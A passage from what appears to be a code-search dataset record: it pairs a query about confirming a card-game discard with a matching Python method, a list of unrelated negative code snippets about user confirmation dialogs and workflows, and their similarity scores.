#self.dealer_hand[0].face_down()\n self.hit(\"player\")\n self.player_hand[0].face_down()\n self.hit(\"dealer\")\n self.dealer_hand[1].face_down()\n self.hit(\"player\")\n self.player_hand[1].face_down()\n self.update_card_positions()" ]
[ "0.6779038", "0.64504594", "0.6393454", "0.6248788", "0.6065166", "0.60555077", "0.60298246", "0.6014514", "0.6014514", "0.5978343", "0.5904059", "0.5888115", "0.5883593", "0.5855397", "0.58428776", "0.584109", "0.5830821", "0.582095", "0.5810005", "0.5807255", "0.5788884", "0.57709986", "0.574667", "0.5738221", "0.5737967", "0.57058537", "0.5680407", "0.56735003", "0.5642896", "0.56291485", "0.562021", "0.5614011", "0.5595327", "0.5593024", "0.556809", "0.55641556", "0.55591893", "0.5558305", "0.5548686", "0.55382204", "0.5533083", "0.55326396", "0.5528881", "0.5528702", "0.55202246", "0.5513971", "0.55041254", "0.5503086", "0.55018395", "0.5488135", "0.54830146", "0.54814434", "0.54784435", "0.5475379", "0.5463058", "0.544991", "0.54472756", "0.544597", "0.54333675", "0.5411004", "0.54085934", "0.5400689", "0.54006267", "0.53977484", "0.5396665", "0.539553", "0.5387312", "0.53800654", "0.5378856", "0.537282", "0.53693086", "0.53602904", "0.53573686", "0.5354459", "0.5354429", "0.5347059", "0.53427076", "0.5342567", "0.53405184", "0.53245234", "0.53223515", "0.5321809", "0.5314615", "0.5301498", "0.52926624", "0.52908504", "0.5289689", "0.5285544", "0.528017", "0.52695525", "0.526711", "0.5264777", "0.52642614", "0.52633953", "0.52546424", "0.52470315", "0.5243854", "0.52418876", "0.52303237", "0.52292776" ]
0.5896568
11
Confirm a user is sure about a discard and then perform it once confirmed.
def discardConfirmation(self, confirmed, wrapped_discards): discards = [] for element in wrapped_discards: discards.append(element.card) if self.discards != discards: confirmed = False self.discards = discards if not confirmed: self.controller.note = "Please confirm - discard " + "{0}".format(self.discards) return True # ask for confirmation else: # confirmed is True, performing discard and removing discarded wrapped cards from hand_info. if self.discard_confirm: controller_response = self.controller.discard(self.discards) if controller_response: for element in wrapped_discards: self.hand_info.remove(element) return False # now that this is done, we don't have anything waiting on confirmation
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def confirm_with_abort() -> None:\n\n click.confirm(\n \"Are you sure you want to drop the users table?\",\n abort=True\n )\n\n click.echo(\"We have gotten to this point, so the user has confirmed.\")", "def action_confirm(self):\n self.check_txt_ids()\n self.write({'state': 'confirmed'})\n return True", "async def confirm(ctx, *args: discord.Member):\n await _confirm(args)", "def confirm(self):\n self.automatically_detected=False\n self.save()", "def unconfirm(self):\n self.automatically_detected=True\n self.save()", "def confirm(dt):\n\n database_api.signOut(Cache.get(\"info\",\n \"token\"\n ),\n Cache.get(\"info\",\n \"nick\"\n )\n )\n\n if platform.system() == \"Linux\":\n os.system(\"sh func/sh/restore.sh\")\n\n App.get_running_app().stop()", "def confirm(self):\n with self.handle_alert(confirm=True):\n self.q(css='button#confirm').first.click()", "def confirm_action(message):\n if not click.confirm(message + \" Continue?\"):\n logger.info(\"User cancels action. Exiting...\")\n exit(0)\n else: return", "def confirm_as_variable() -> None:\n\n confirmed = click.confirm(\"Are you sure you want to drop the users table?\")\n status = click.style(\"yes\", fg=\"green\") if confirmed else click.style(\"no\", fg=\"red\")\n click.echo(\"Drop table confirmed?: \" + status)", "def action_confirm(self):\n options=self.env['plm.config.settings'].GetOptions()\n status = 'confirmed'\n action = 'confirm'\n default = {\n 'state': status,\n 'engineering_writable': False,\n }\n doc_default = {\n 'state': status,\n 'writable': False,\n }\n operationParams = {\n 'status': status,\n 'statusName': _('Confirmed'),\n 'action': action,\n 'docaction': 'confirm',\n 'excludeStatuses': ['confirmed', 'transmitted', 'released', 'undermodify', 'obsoleted'],\n 'includeStatuses': ['draft'],\n 'default': default,\n 'doc_default': doc_default,\n }\n if options.get('opt_showWFanalysis', False):\n return self.action_check_workflow(operationParams)\n else:\n ids=self._ids\n self.logging_workflow(ids, action, status)\n return self._action_to_perform(ids, operationParams, default)", "def confirm(self, message):\n raise NotImplementedError", "def confirm_removal(confirm, filename):\n if confirm == 'y' or confirm == 'yes':\n remove_file(filename)\n elif confirm == 'n' or confirm == 'no':\n print(\"File will stay there\")\n else:\n print(\"Please etner a valid answer (y/n, yes/no)\")\n confirm_removal()", "def cancel(self):\n with self.handle_alert(confirm=False):\n self.q(css='button#confirm').first.click()", "def confirm():\n\t\traise NotImplementedError", "def confirmed(self):", "def confirm_delete(self):\n self.language = LANGUAGE.get(self.lang)\n message = Message(self.language[\"del_user\"], self.language[\"del_info\"])\n delete_message = message.create_question_message(self.language[\"yes\"])\n response = delete_message.exec()\n\n if response == QMessageBox.Yes:\n self.delete_user()\n elif response == QMessageBox.No:\n delete_message.close()", "def confirm():\n if request.method == 'POST':\n user_type = session.get('type', None)\n if user_type == 'Admin':\n return redirect('/index')\n elif user_type == 'Client':\n return redirect('/clients/' + session.get('name'))\n else:\n return redirect('/')\n\n confirmed = request.values['confirmed']\n \n return render_template('confirm.html', confirmed=confirmed)", "def test_confirm_user(self):\n user = User(email=\"test@email.com\", password=\"testpassword\")\n\n self.assertFalse(user.confirmed)\n self.assertIsNone(user.confirmed_at)\n self.assertIsNotNone(user.confirmation_token)\n\n user.confirm()\n\n self.assertTrue(user.confirmed)\n self.assertIsNotNone(user.confirmed_at)\n self.assertIsNone(user.confirmation_token)", "def confirm_so(self, cr, uid, ids,context=None):\n return self.write(cr, uid, ids, {'state':'confirm_so'}, context=context)", "def prompt_discard(self, num_discards: int, state: 'State'):\n # TODO: Refactor to allow for flexible discarding (see Cellar). Meybe a force discard and a prompt discard?\n while self.hand and num_discards > 0:\n sorted_hand = sorted(list(self.hand), key=card_sort)\n card_name = self.get_input(\n f'Discard {num_discards} cards'\n f'Hand: {sorted_hand}',\n sorted_hand,\n state\n )\n # If the prompted card is in hand, discard it\n card = next((card for card in self.hand if card.name == card_name), None)\n if card:\n self.hand[card] -= 1\n self.hand += Counter() # Remove 0 and negative counts\n self.discard_pile.append(card)\n num_discards -= 1\n print(f'Discarded {card.name}')\n else:\n print(f'{card.name} is not in hand')", "def __onConfirmNo(self):\n self.__confDlg.reject()", "def cancel_dummy(self):\n if self.state != 'authorized':\n self.raise_user_error('cancel_only_authorized')\n else:\n self.state = 'cancel'\n self.save()", "def confirm(secret_id='', game=None):\n player = get_player(current_app, request, secret_id)\n if player.is_confirmed:\n flash(_('Your name is already confirmed as %(n)s', n=player.name),\n 'error')\n return redirect(url_for('player.player',\n secret_id=player.secret_id,\n _method='GET'))\n if game.state != game.State.CONFIRMING:\n return render_template('player/too-late.html',\n player_name=player.name)\n if request.method == 'POST':\n player.confirm(request.form.get('player_name', ''))\n session[USER_COOKIE] = player.cookie\n return redirect(url_for('player.player',\n secret_id=player.secret_id,\n _method='GET'))\n else: # request.method == 'GET'\n return render_template('player/confirm.html',\n unconfirmed_name=player.name,\n secret_id=secret_id)", "def confirm(self, task, log):\n self._tasks_in_process.remove(task)\n log.confirm(self._name, task.get_name(), task.get_payment())", "def _handle_consent_confirmation(user, is_confirmed):\n if is_confirmed == \"yes\":\n # user has already given consent, continue flow\n response = server.create_authorization_response(grant_user=user)\n else:\n # user did not give consent\n response = server.create_authorization_response(grant_user=None)\n return response", "def confirm(userid, choice, popupid):\r\n if choice:\r\n players[userid].resetSkills()", "def Confirm(self):\r\n \r\n global references\r\n self.from_ed = self.ed_result.get(\"1.0\",'end-1c')\r\n references.append(self.from_ed)\r\n self.confirm_b.configure(state = 'disabled')\r\n self.discard_b.configure(state = 'disabled')\r\n self.finalresult.configure(state = 'normal')\r\n self.finalresult.delete('1.0', END)\r\n \r\n self.final()", "def no_going_back(confirmation):\r\n if not confirmation:\r\n confirmation = 'yes'\r\n\r\n return valid_response(\r\n 'This action cannot be undone! '\r\n 'Type \"%s\" or press Enter to abort: ' % confirmation,\r\n str(confirmation))", "def confirm(text, window=None):\n return message(text, u'Confirma', M_QUESTION, B_YES_NO, window) == R_YES", "def confirm(self, token):\n ser = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = ser.loads(token.encode('utf-8'))\n except (BadSignature, SignatureExpired):\n return False\n if data.get('confirm') != self.id:\n return False\n self.confirmed = True\n db.session.add(self)\n return True", "def admin_reject(user):\n if user.comments in (None or \"\"):\n return\n\n subject = \"ECE/CIS Account - Account Application rejected for %s\" % user.username\n application = \"https://www.eecis.udel.edu/NewAccount/\"\n helprequest = \"https://www.eecis.udel.edu/service\"\n sponsor = \"%s@eecis.udel.edu\" % user.sponsor\n \n message = \"Your ECE/CIS Account has been rejected by ECE/CIS faculty adminstrators.\\n\" % user.sponsor\n message += \"The reason given for rejection was:\\n\\n%s\\n\\n\" % user.comments\n message += \"You may re-apply with corrected information at %s\\n\" % application\n message += \"Please don't reply to this email. If have any questions, please \\n\"\n message += \"please post a ticket as an outsider at %s\" % helprequest\n message += \"-- ECE\\CIS Labstaff\"\n\n\n send('account@eecis.udel.edu', 'ECE/CIS Account System', \\\n [user.email, sponsor], subject, message, MAILHOST)", "def action_confirm(self):\n # context = self._context or {}\n inv_obj = self.env['account.invoice']\n\n brw = self.browse(self.ids[0])\n line_ids = brw.line_ids\n if not line_ids:\n raise exceptions.except_orm(\n _('Invalid Procedure!'), _(\"No retention lines\"))\n\n res = [True]\n res += [False for i in line_ids\n if (i.wh_amount <= 0.0 or\n i.base_amount <= 0.0 or\n i.wh_src_rate <= 0.0)]\n if not all(res):\n raise exceptions.except_orm(\n _('Invalid Procedure!'),\n _(\"Verify retention lines do not have Null values(0.00)\"))\n\n res = 0.0\n for i in line_ids:\n res += i.wh_amount\n if abs(res - brw.wh_amount) > 0.0001:\n raise exceptions.except_orm(\n _('Invalid Procedure!'),\n _(\"Check the amount of withholdings\"))\n\n inv_ids = [i.invoice_id.id for i in brw.line_ids]\n if inv_ids:\n inv_obj.write({'wh_src_id': self.ids[0]})\n\n return self.write({'state': 'confirmed'})", "async def _global(self, ctx, confirmation: bool = False):\r\n global_bank = await bank.is_global()\r\n if global_bank is False:\r\n return await ctx.send(_(\"This command cannot be used with a local bank.\"))\r\n\r\n if confirmation is False:\r\n await ctx.send(\r\n _(\r\n \"This will delete all bank accounts for users \"\r\n \"who no longer share a server with the bot.\"\r\n \"\\nIf you're sure, type `{prefix}bank prune global yes`\"\r\n ).format(prefix=ctx.clean_prefix)\r\n )\r\n else:\r\n await bank.bank_prune(self.bot)\r\n await ctx.send(\r\n _(\r\n \"Bank accounts for users who \"\r\n \"no longer share a server with the bot have been pruned.\"\r\n )\r\n )", "async def _local(self, ctx, confirmation: bool = False):\r\n global_bank = await bank.is_global()\r\n if global_bank is True:\r\n return await ctx.send(_(\"This command cannot be used with a global bank.\"))\r\n\r\n if confirmation is False:\r\n await ctx.send(\r\n _(\r\n \"This will delete all bank accounts for users no longer in this server.\"\r\n \"\\nIf you're sure, type \"\r\n \"`{prefix}bank prune local yes`\"\r\n ).format(prefix=ctx.clean_prefix)\r\n )\r\n else:\r\n await bank.bank_prune(self.bot, guild=ctx.guild)\r\n await ctx.send(\r\n _(\"Bank accounts for users no longer in this server have been deleted.\")\r\n )", "def confirmation_failed(self):", "def confirm_further(self, update, context):\n response_code = update.callback_query[\"data\"] # wouldyou_{yes|no}\n request_id = context.user_data[\"current_request\"]\n log.info(\"No further comments req:%s %s\", request_id, response_code)\n self.finalize_request(update, context, request_id)", "def confirm(force):\n if not force:\n ans = input(que(bold(\"Are you sure? [y/N]: \")))\n else:\n ans = 'y'\n\n return ans.lower()", "def _confirm_action(self, action):\n\t\treturn True", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def confirm_wouldyou(self, update, context):\n chat_id = update.effective_chat.id\n response_code = update.callback_query[\"data\"] # wouldyou_{yes|no}\n request_id = context.user_data[\"current_request\"]\n log.info(\"Wouldyou req:%s %s\", request_id, response_code)\n\n if response_code == \"wouldyou_yes\":\n # they want to keep returning to this beneficiary\n context.bot_data[request_id][\"would_return\"] = True\n else:\n context.bot_data[request_id][\"would_return\"] = False\n\n # Send the next question, asking if they have any special comments for future volunteers\n self.updater.bot.send_message(\n chat_id=chat_id,\n text=c.MSG_FEEDBACK_FURTHER_COMMENTS % context.bot_data[request_id][\"beneficiary\"],\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(k.further_comments_choices),\n )\n context.user_data[\"state\"] = c.State.EXPECTING_FURTHER_COMMENTS", "def accept_cancel(self):\n self.ok = False\n self.destroy()", "def profileupdaterequest_discard(request, request_id):\n profileupdate = get_object_or_404(ProfileUpdateRequest, active=True,\n pk=request_id)\n profileupdate.active = False\n profileupdate.save()\n\n messages.success(request,\n 'Profile update request was discarded successfully.')\n return redirect(reverse('all_profileupdaterequests'))", "def confirmed(self, cr, uid, ids, context=None): \n self.write(cr, uid, ids, {'state':'confirmed'})\n return True", "def confirm_action(config, msg=None, allow_auto=True):\n # type: (dict, str, bool) -> bool\n if allow_auto and config['_auto_confirm']:\n return True\n if msg is None:\n msg = 'action'\n while True:\n user = get_input('Confirm {} [y/n]: '.format(msg)).lower()\n if user in ('y', 'yes', 'n', 'no'):\n break\n if user in ('y', 'yes'):\n return True\n return False", "def confirm():\n if g.session.user.email_confirmed:\n return redirect(url_for('index.index'))\n\n token = request.args.get('token')\n if token:\n try:\n user: User = db.session.query(User) \\\n .filter(User.confirmation_token == token).one()\n\n user.email_confirmed = True\n user.confirmation_token = None\n db.session.merge(user)\n db.session.commit()\n\n return render_template('sites/auth/confirm.html',\n title=gettext('Confirm Email'),\n sent=False, success=True), 200\n except NoResultFound:\n return render_template('sites/auth/confirm.html',\n title=gettext('Confirm Email'),\n sent=False, success=False), 401\n else:\n return render_template('sites/auth/confirm.html',\n title=gettext('Confirm Email'), sent=True), 200", "async def async_step_confirm(self, user_input=None):\n errors = {}\n if user_input is not None:\n return await self.async_step_one(user_input=None)\n return self.async_show_form(step_id=\"confirm\", errors=errors)", "def test_manually_confirm(self):\n data = {}\n response = self.client.post(self.url, data)\n self.assertRedirects(response, reverse('reminders_dashboard'))\n\n reminder = reminders.SentNotification.objects.get(pk=self.unconfirmed.pk)\n self.assertEqual(reminder.status, 'manual')\n self.assertEqual(reminder.date_confirmed.date(), datetime.date.today())", "def test_manually_confirm(self):\n data = {}\n response = self.client.post(self.url, data)\n self.assertRedirects(response, reverse('reminders_dashboard'))\n\n reminder = reminders.SentNotification.objects.get(pk=self.unconfirmed.pk)\n self.assertEqual(reminder.status, 'manual')\n self.assertEqual(reminder.date_confirmed.date(), datetime.date.today())", "def proceed():\n c_print(\"********** PROCEED? **********\")\n # capture user input\n confirm = input(\" \" * 36 + \"(y/n) \")\n # quit script if not confirmed\n if confirm.lower() != \"y\":\n c_print(\"******* EXITING SCRIPT *******\")\n print(\"~\" * 80)\n exit()\n else:\n c_print(\"********* PROCEEDING *********\")", "async def cancel(self, ctx):\n author: User = ctx.user_object\n\n if has_post_permission(ctx.guild.id, ctx.channel.id):\n try:\n task = adv.get_adventure(ctx.author.id)\n\n adventureid = task[0]\n if adventureid == '0':\n if author.has_item_by_item(REAPER_TOKEN):\n author.update_inventory(REAPER_TOKEN, remove=True)\n adv.remove(ctx.author.id)\n out = 'Slayer task cancelled!'\n else:\n out = 'Error: You do not have a reaper token.'\n elif adventureid == '1':\n adv.remove(ctx.author.id)\n out = 'Killing session cancelled!'\n elif adventureid == '2':\n adv.remove(ctx.author.id)\n out = 'Quest cancelled!'\n elif adventureid == '3':\n adv.remove(ctx.author.id)\n out = 'Gather cancelled!'\n elif adventureid == '4':\n adv.remove(ctx.author.id)\n out = 'Clue scroll cancelled!'\n elif adventureid == '5':\n adv.remove(ctx.author.id)\n out = 'Reaper task cancelled!'\n elif adventureid == '6':\n adv.remove(ctx.author.id)\n out = 'Runecrafting session cancelled!'\n else:\n out = f'Error: Invalid Adventure ID {adventureid}'\n\n except NameError:\n out = 'You are not currently doing anything.'\n await ctx.send(out)", "def button_confirm_bank(self):\n\n self.unlink_unconfirmed_lines()\n ret = super(AccountBankStatement, self).button_confirm_bank()\n return ret", "def confirm(msg: str = \"Do you want it:\", default: bool = True) -> bool:\n\n question = [\n {\n 'type': 'confirm',\n 'name': 'confirm',\n 'message': msg,\n 'default': default\n }\n ]\n try:\n answer = prompt(question)\n return answer['confirm']\n except KeyError:\n exit = confirm(msg=\"Do you want cancel script\")\n if exit:\n raise SystemExit\n else:\n return confirm(msg, default)", "async def user(\r\n self, ctx, member_or_id: Union[discord.Member, RawUserIds], confirmation: bool = False\r\n ):\r\n global_bank = await bank.is_global()\r\n if global_bank is False and ctx.guild is None:\r\n return await ctx.send(_(\"This command cannot be used in DMs with a local bank.\"))\r\n try:\r\n name = member_or_id.display_name\r\n uid = member_or_id.id\r\n except AttributeError:\r\n name = member_or_id\r\n uid = member_or_id\r\n\r\n if confirmation is False:\r\n await ctx.send(\r\n _(\r\n \"This will delete {name}'s bank account.\"\r\n \"\\nIf you're sure, type \"\r\n \"`{prefix}bank prune user {id} yes`\"\r\n ).format(prefix=ctx.clean_prefix, id=uid, name=name)\r\n )\r\n else:\r\n await bank.bank_prune(self.bot, guild=ctx.guild, user_id=uid)\r\n await ctx.send(_(\"The bank account for {name} has been pruned.\").format(name=name))", "def waiting_confirmation(self):", "def eventrequest_discard(request, request_id):\n eventrequest = get_object_or_404(EventRequest, active=True, pk=request_id)\n eventrequest.active = False\n eventrequest.save()\n\n messages.success(request,\n 'Workshop request was discarded successfully.')\n return redirect(reverse('all_eventrequests'))", "def test_reset_confirmation(self):\n self._create_program_and_course_enrollment(self.program_uuid, self.user)\n\n with self._replace_stdin('confirm'):\n call_command(self.command, self.program_uuid)\n\n self._validate_enrollments_count(0)", "def confirmBlock(self, activePlayer, opponentAction):\n # todo: raise notImplemented. should be overriden\n return None", "def notify_email_confirmed(self, user, email):\n \n # make sure user isn't still invited to groups he owns or is a member of\n for g in self.users_groups(user):\n g.remove_invitation(user)", "async def reset(self, ctx, confirmation: bool = False):\r\n if confirmation is False:\r\n await ctx.send(\r\n _(\r\n \"This will delete all bank accounts for {scope}.\\nIf you're sure, type \"\r\n \"`{prefix}bank reset yes`\"\r\n ).format(\r\n scope=self.bot.user.name if await bank.is_global() else _(\"this server\"),\r\n prefix=ctx.clean_prefix,\r\n )\r\n )\r\n else:\r\n await bank.wipe_bank(guild=ctx.guild)\r\n await ctx.send(\r\n _(\"All bank accounts for {scope} have been deleted.\").format(\r\n scope=self.bot.user.name if await bank.is_global() else _(\"this server\")\r\n )\r\n )", "def resetConfirm(self):\n\n ## Check if exposure is in progress\n if self.thread.isRunning():\n QtGui.QMessageBox.warning(self, \"Exposure warning.\", \"Exposure in progress, unable to close program.\", QtGui.QMessageBox.Ok)\n return\n\n else:\n reply = QtGui.QMessageBox.question(self, 'Confirmation','Are you sure you want to reset the STA3800 controller?',\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.No)\n\n if reply == QtGui.QMessageBox.Yes:\n self.reset()", "def you_should_be_able_to_confirm_and_close(driver):\n wait_on_element(driver, 0.5, 30, '//h1[contains(.,\"Test Changes\")]')\n driver.find_element_by_xpath('//mat-checkbox[@ix-auto=\"checkbox__CONFIRM\"]').click()\n driver.find_element_by_xpath('//button[@ix-auto=\"button__TEST CHANGES\"]').click()\n wait_on_element_disappear(driver, 1, 30, '//h6[contains(.,\"Please wait\")]')", "def confirm_tend(self, before, after, tx):\n assert True", "def test_confirm_fail_consent_oauth_token(self):\n # First perform an add request that creates the flow request with status 'PENDING'\n res = self._add_flow_request()\n confirm_id = res.json()['confirm_id']\n process_id = res.json()['process_id']\n callback_url = 'http://127.0.0.1/'\n\n self.client.login(username='duck', password='duck')\n res = self.client.get('/v1/flow_requests/confirm/?confirm_id={}&callback_url={}&action=add'.format(\n confirm_id, callback_url))\n self.assertRedirects(res, \"{}?process_id={}&success=false&error={}\".format(callback_url, process_id, ERRORS_MESSAGE['INTERNAL_GATEWAY_ERROR']),\n fetch_redirect_response=False)", "def send_confirmation(self):\r\n c.user.email_validated = False\r\n c.user.confirmation_code = random_key(6)\r\n c.user._commit()\r\n emailer.confirmation_email(c.user)", "def handle_email_confirmed(sender, **kwargs):\n email = kwargs['email_address']\n email.user.userprofile.member.cast().confirm_email()", "def iscanceled(*args):", "def on_cancel(self):\n self.state = CANCELED\n self._reject()", "def _confirm(self, delay_factor=1):\n\n delay_factor = self.select_delay_factor(delay_factor)\n error_marker = \"Nothing to confirm in configuration\"\n command_string = \"confirm\"\n\n if self.check_config_mode():\n self.exit_config_mode()\n\n output = self.send_command(\n command_string=command_string, delay_factor=delay_factor\n )\n\n if error_marker in output:\n raise ValueError(\n \"Confirm failed with following errors:\\n\\n{}\".format(output)\n )\n return output", "def confirm_yes():\r\n confirm = raw_input(\"Enter 'yes' to confirm: \")\r\n if confirm == 'yes':\r\n return True\r\n return False", "def confirm(id):\n #: get resources\n user = User.query.get_or_404(id)\n service = SignUpService(user)\n input_token = request.args['token']\n\n #: active current account\n try:\n service.active(input_token)\n except TokenUsedError:\n message = _(u\"The account had been actived.\")\n return render_template(\"confirm-failed.html\", message=message), 403\n except TokenWrongError:\n message = _(u\"The active token is invalid.\")\n return render_template(\"confirm-failed.html\", message=message), 403\n\n #: automatic sign in\n session_login(user)\n #: output a success message\n message = _(u\"The account has been actived successfully.\")\n return render_template(\"confirm-success.html\", message=message)", "def confirm(msg: str) -> bool:\n res = input(msg + \" (Y/n) > \")\n if res == 'Y' or res == 'y' or res == 'yes' or res == 'Yes' or res == \"\":\n return True\n return False", "def test_yes_option_disabled(\n self, wait_tx_settled_mock, confirm_mock, do_transfer_mock\n ):\n password_option = self.get_password_args(self.PASSWORD)\n self.invoke(\n \"transfer\",\n self.LEDGER_ID,\n self.get_address(self.LEDGER_ID, self.PASSWORD),\n \"100000\",\n \"100\",\n *password_option,\n )\n confirm_mock.assert_called_once()", "def confirm(message: str = \"Confirm?\", suffix: str = \" (y/n) \") -> bool:\n session = create_confirm_session(message, suffix)\n return session.prompt()", "def confirmCall(self, activePlayer, action):\n # todo: raise notImplemented. should be overriden\n return False", "def confirm_email(self):\n # The base class' implementation does nothing\n pass", "def _confirm_prompt(message, prompt=\"\\nAre you sure? [y/yes (default: no)]: \",\n affirmations=(\"Y\", \"Yes\", \"yes\", \"y\")):\n answer = input(message + prompt)\n return answer in affirmations", "def confirm(self, prompt, default):\n raise NotImplementedError(NotImplementedMessage)", "def confirmation(self, question, answer):\n confirm_flag = False\n while confirm_flag not in ['y', 'n']:\n confirm_flag = raw_input(question + ' [y/n]: ')\n if confirm_flag == 'y':\n print answer\n elif confirm_flag == 'n':\n print 'The user cancel the operation'\n exit()\n else:\n print 'The entry is not valid, please enter y or n.'\n return True", "def confirm(self, prompt=None, resp=False):\n\n if prompt is None:\n prompt = 'Confirm'\n\n if resp:\n prompt = '%s [%s]|%s: ' % (prompt, 'y', 'n')\n else:\n prompt = '%s [%s]|%s: ' % (prompt, 'n', 'y')\n\n while True:\n ans = raw_input(prompt)\n if not ans:\n return resp\n if ans not in ['y', 'Y', 'n', 'N']:\n print 'please enter y or n.'\n continue\n if ans == 'y' or ans == 'Y':\n return True\n if ans == 'n' or ans == 'N':\n return False", "def confirm_reset(self):\r\n confirm = QMessageBox.question(self,\r\n self.confirmDBClearTitleString,\r\n self.confirmDBClearQuestionString,\r\n QMessageBox.Yes |\r\n QMessageBox.No,\r\n QMessageBox.No)\r\n\r\n if confirm == QMessageBox.Yes:\r\n self.reset()", "def confirm(self, action):\n title = \"%s : P L E A S E C O N F I R M\" % action\n question_text = \"<html><b>%s - PLEASE CONFIRM.</b><br/>\"\\\n \"<br/>Do you want to %s %s recordings for the following project?\"\\\n \"<br/><br/>PROJECT : %s\"\\\n \"<br/>CLIENT : %s\"\\\n \"<br/>DATE : %s<br/></html>\" % (\n action.upper(),\n action,\n \" & \".join(self.selected_formats),\n self.recordings_table.project_details()[2],\n self.recordings_table.project_details()[3],\n self.recordings_table.project_details()[0]\n )\n\n self.hide()\n if action == 'upload':\n self.confirmation_dialog.setText(title, question_text)\n self.confirmation_dialog.exec_()\n self.show()\n\n if self.confirmation_dialog.cancelled:\n return (False, False)\n\n return (True, self.confirmation_dialog.immediate_upload)\n else:\n self.confirmation_dialog.showQuestion(title, question_text)\n self.show()\n return self.confirmation_dialog.copy_confirmed", "def test_canceled_unopposed(self):\n s1 = self.battle.create_skirmish(self.alice, 10) # Attack 10\n s1a = s1.react(self.bob, 8,\n troop_type=\"cavalry\") # --Attack 8 (12)\n s1a.react(self.alice, 6,\n troop_type=\"ranged\") # ----Attack 6 (9)\n s1.resolve()\n self.assertEqual(s1.victor, self.alice.team)\n self.assert_(s1.unopposed)\n\n # Should be 20 VP (double the 10 it'd ordinarily be worth)\n self.assertEqual(s1.vp, 20)", "def disassociate_accounts(request, id):\n election = get_object_or_404(Election, pk=id)\n success = False\n if request.POST and \"confirm\" in request.POST:\n election.disassociate_accounts()\n success = True\n return render_to_response(\"django_elect/disassociate.html\", {\n \"title\": \"Disassociate Accounts for Election %s\" % election,\n \"election\": election,\n \"success\": success,\n }, context_instance=RequestContext(request))", "async def confirm(self, msg, *args):\n if Controller.prev_regex is None:\n await msg.channel.send(**{\n 'content': 'No key change in progress',\n 'reference': msg.to_reference(),\n 'mention_author': True,\n })\n return\n Controller.prev_regex = None\n Controller.prev_help = None\n await msg.channel.send(**{\n 'content': 'Key change confirmed',\n 'reference': msg.to_reference(),\n 'mention_author': True,\n })", "def test_confirm_invalid_action(self):\n headers = self._get_oauth_header()\n # using delete but it doesn't matter if it's delete or add\n res = self.client.delete('/v1/flow_requests/p_11111/', **headers)\n confirm_id = res.json()['confirm_id']\n callback_url = 'http://127.0.0.1/'\n\n self.client.login(username='duck', password='duck')\n res = self.client.get('/v1/flow_requests/confirm/?confirm_id={}&callback_url={}&action=NOT_VALID'.format(\n confirm_id, callback_url))\n\n self.assertEqual(res.status_code, 400)\n self.assertEqual(res.content.decode('utf-8'), ERRORS_MESSAGE['UNKNOWN_ACTION'])", "def confirm_reset(self):\r\n confirm = QMessageBox.question(self,\r\n self.confirmDBClearTitleString,\r\n self.confirmDBClearQuestionString,\r\n QMessageBox.Yes |\r\n QMessageBox.No,\r\n QMessageBox.No)\r\n\r\n if confirm == QMessageBox.Yes:\r\n self.reset()", "def confirm_email(self, request, email_address):\n email_address.verified = True\n email_address.set_as_primary(conditional=True)\n email_address.save()\n\n u = get_user_model().objects.get(pk=email_address.user.id)\n u.is_active = True\n u.save()", "def confirmed(self, cr, uid, ids, context=None):\n\tallow_archive_line_obj = self.pool.get('services.contracts.allowances.lines')\n for record in self.browse(cr, uid, ids, context=context):\n\t\tif not record.allowances_lines_before :\n \traise osv.except_osv(_('Partner Lines !'), _('Sorry no partner Lines!'))\n\n\t \tlines_ids = [line.id for line in record.allowances_lines_after]\n \tallow_archive_line_obj.unlink(cr,uid,lines_ids,context=context)\n\n\t\tfor lines in record.allowances_lines_before:\n\t\t\tif lines.percentage_rating < 0 or lines.percentage_rating > 100 :\n \t\traise osv.except_osv(_('Rate Error !'), _('Sorry you insert wrong rate ... rate is between (0,100)!'))\n \t\tamount_after_rate_id = allow_archive_line_obj.create(cr, uid, {\n \t\t\t\t'cost_of_rent':lines.cost_of_rent,\n \t\t\t\t'amount_untaxed':round (lines.amount_untaxed*lines.percentage_rating/100,2),\n \t\t\t\t'amount_tax':round(lines.amount_tax*lines.percentage_rating/100,2),\n \t\t\t\t'amount_total':round(lines.amount_total*lines.percentage_rating/100,2),\n \t\t\t\t'deduct_days':lines.deduct_days,\n \t\t\t\t'deduct_amount':lines.deduct_amount,\n \t\t\t\t'contract_id':lines.contract_id.id,\n\t\t\t\t\t'env_allow_id_after_rate':record.id,\n\t\t\t\t\t'type': 'after',\n 'category_id':lines.category_id.id,\n\t\t\t\t\t'percentage_rating':lines.percentage_rating,\n\n })\n\t\t\n \n self.write(cr, uid, ids, {'state':'confirmed'})\n return True", "async def remove(message, client, extra_args):\n\n if await funnypts_transaction(message, client, extra_args, \"remove\"):\n await message.channel.send(\"BRUH, THAT WAS CRINGE. SOMEONE JUST REVOKED YOUR FUNNYPOINT\")", "def alert_cancel(self):\n self._alert_accept_cancel(False)", "async def _delete_data(self, ctx: Context):\n\n if ctx.guild is not None:\n return await ctx.send(\"This command is available in DMs only.\")\n\n msg = await ctx.send(\n \"Are you sure you want to delete all your data? It will reset\"\n \" all your progress. **This action is irreversible.**\"\n )\n start_adding_reactions(msg, ReactionPredicate.YES_OR_NO_EMOJIS)\n\n pred = ReactionPredicate.yes_or_no(msg, ctx.author)\n try:\n await ctx.bot.wait_for(\"reaction_add\", check=pred)\n except asyncio.TimeoutError:\n return await ctx.send(\"You took too long to react. Data deletion cancelled.\")\n\n if pred.result is True:\n await ctx.send(\n \"Please reply to this message by sending `CONFIRM`,\"\n \" without any formatting, to confirm data deletion.\"\n )\n\n inner_pred = MessagePredicate.same_context(ctx)\n\n try:\n await self.bot.wait_for(\"message\", check=inner_pred, timeout=30)\n except asyncio.TimeoutError:\n return await ctx.send(\"You took too long to respond. Data deletion cancelled.\")\n\n if inner_pred.content.strip() == \"CONFIRM\":\n await self.config.user(ctx.author).clear()\n else:\n return await ctx.send(\"Cancelled data deletion.\")\n\n else:\n return await ctx.send(\"Cancelled data deletion request.\")\n\n await ctx.send(\n \"Data deletion request successful. All data associated with your account\"\n \" will be deleted within 24 hours. Data is not recoverable anymore.\"\n )", "def confirm_dispatch(self, update, context):\n chat_id = update.effective_chat.id\n 